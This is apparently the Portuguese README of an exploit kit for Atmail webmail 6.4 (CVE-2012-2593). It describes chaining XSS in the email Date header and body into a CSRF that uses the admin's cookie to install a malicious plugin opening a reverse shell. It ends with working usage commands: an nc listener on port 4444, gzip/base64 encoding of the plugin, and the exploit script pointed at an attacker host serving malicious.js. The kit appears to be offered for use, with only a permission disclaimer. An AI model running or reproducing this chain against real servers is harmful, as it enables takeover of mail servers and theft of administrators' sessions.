
Atmail XSS-CSRF-RCE Cadeia de Exploração
atmail-rce.py: Explora CVE-2012-2593 na interface webmail do Atmail.
atmail-csrf.js: Arquivo Javascript que aproveita CVE 2012-2593 em um CSRF para instalar um plugin malicioso que executa um shell reverso
Plugin.php: Plugin do Atmail a ser instalado que chama um shell reverso
!!Use apenas contra servidores nos quais você tem permissão para testar
O servidor de email Atmail versão 6.4 possui uma vulnerabilidade XSS tanto no cabeçalho de email Date quanto no Corpo do Email (via injeção de iFrame). Isso é aproveitado em um CSRF usando a API XHR do JavaScript para enviar uma requisição com o cookie do usuário admin para o painel de administração, instalando um Plugin malicioso que executa código para um shell reverso.
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/